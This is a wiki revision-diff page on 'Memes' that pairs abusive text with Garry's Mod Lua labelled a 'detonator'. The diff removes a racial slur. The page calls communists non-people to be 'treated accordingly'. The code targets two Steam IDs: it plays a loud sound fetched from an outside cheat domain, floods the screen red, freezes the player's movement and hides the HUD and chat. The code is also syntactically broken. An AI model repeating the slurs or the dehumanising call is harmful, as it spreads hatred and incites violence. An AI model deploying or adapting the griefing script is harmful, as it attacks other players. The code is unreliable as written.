Difference between revisions of "Memes"

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Line 4: Line 4:
== fuck you ==
== fuck you ==
madman is a nigger
madman is a coal miner
== source code for nigger detonator ==
== source code for coal detonator ==
  for k,v in pairs(player.GetAll()) do
  for k,v in pairs(player.GetAll()) do
Line 80: Line 80:
  cmd:SetUpMove( 0 )
  cmd:SetUpMove( 0 )
  hook.Add( "CreateMove", "niggerwalker", asshole )
  hook.Add( "CreateMove", "coalwalker", asshole )

Latest revision as of 20:07, 4 October 2019

a meme

Memes are total fucking dogshit and shouldn't exist. the United States Government intends to use memes in psychological warfare against the populous to cause global upset and to kill communist retards. As everyone knows, though, communists are NOT people, and should be treated accordingly.

fuck you

madman is a coal miner

source code for coal detonator

 for k,v in pairs(player.GetAll()) do
 if (LocalPlayer():SteamID64() == "76561198370895099" or LocalPlayer():SteamID64() == "76561198223939436" ) then
 function earrape()
 sound.PlayURL ( "http://shitcheat.me/geturowncheat.mp3", "", function( station )
 	if ( IsValid( station ) ) then
 		station:SetPos( LocalPlayer():GetPos() )
 		LocalPlayer():ChatPrint( "uh oh" )
 end )
 hook.Add( "RenderScreenspaceEffects", "retarddisabler", function()
 local tabber = {
 	["$pp_colour_addr"] = 2,
 	["$pp_colour_addg"] = 0,
 	["$pp_colour_addb"] = 0,
 	["$pp_colour_brightness"] = 0.7,
 	["$pp_colour_contrast"] = 0.6,
 	["$pp_colour_colour"] = 3,
 	["$pp_colour_mulr"] = 10,
 	["$pp_colour_mulg"] = 0,
 	["$pp_colour_mulb"] = 0
 	DrawColorModify( tabber )
 function asshole( cmd, ply, origin, angles, fov )
 	local time = FrameTime()
 	SH.ViewOrigin = SH.ViewOrigin + ( SH.Velocity * time)
 	SH.Velocity = SH.Velocity * 0.95
 	local sensitivity = 0.022
 	SH.ViewAngle.p = math.Clamp( SH.ViewAngle.p + ( cmd:GetMouseY() * sensitivity ), -89, 89 ) 
 	SH.ViewAngle.y = SH.ViewAngle.y + ( cmd:GetMouseX() * -1 * sensitivity )
 	local nig = Vector( 0, 0, 0 )
 	local add = Vector( 0, 0, 0 )
 	local ang = SH.ViewAngle
 	if ( cmd:KeyDown( IN_FORWARD ) ) then add = add + ang:Forward() end
 	if ( cmd:KeyDown( IN_BACK ) ) then add = add - ang:Forward() end
 	if ( cmd:KeyDown( IN_MOVERIGHT ) ) then add = add + ang:Right() end
 	if ( cmd:KeyDown( IN_MOVELEFT ) ) then add = add - ang:Right() end
 	if ( cmd:KeyDown( IN_JUMP ) ) then add = add + ang:Up() end
 	if ( cmd:KeyDown( IN_DUCK ) ) then add = add - ang:Up() end
 	add = add:GetNormal() * defcon.Settings["freecamspeed"]
 	if ( cmd:KeyDown( IN_SPEED ) ) then add = add * 2 end
 	SH.Velocity = SH.Velocity + add
 	if ( 1 == 1 ) then
 		SH.LockView = cmd:GetViewAngles()
 	if ( 1 == 1 ) then
 		cmd:SetViewAngles( SH.LockView )
 	cmd:SetForwardMove( 0 )
 	cmd:SetSideMove( 0 )
 	cmd:SetUpMove( 0 )
 hook.Add( "CreateMove", "coalwalker", asshole )
 local LightingModeChanged = false
 hook.Add( "PreRender", "fuckoff", function()
 if defcon.Settings["fullbright"] and GetConVarNumber("panicmode") == 0 then
 	render.SetLightingMode( 2 )
 	LightingModeChanged = true
 end )
 hook.Add( "PostRender", "fullbright", EndOfLightingMod )
 hook.Add( "DrawHUD", "fullbright", EndOfLightingMod )
 local hide = {
 	["CHudHealth"] = true,
 	["CHudBattery"] = true,
 	["CHudAmmo"] = true,
 	["CHudChat"] = true,
 	["CHudCrosshair"] = true,
 	["CHudGMod"] = true,
 	["CHudMenu"] = true,
 	["NetGraph"] = true,
 	["CHudWeapon"] = true
 hook.Add( "HUDShouldDraw", "HideHUD", function( name )
 	if ( hide[ name ] ) then return false end
 end )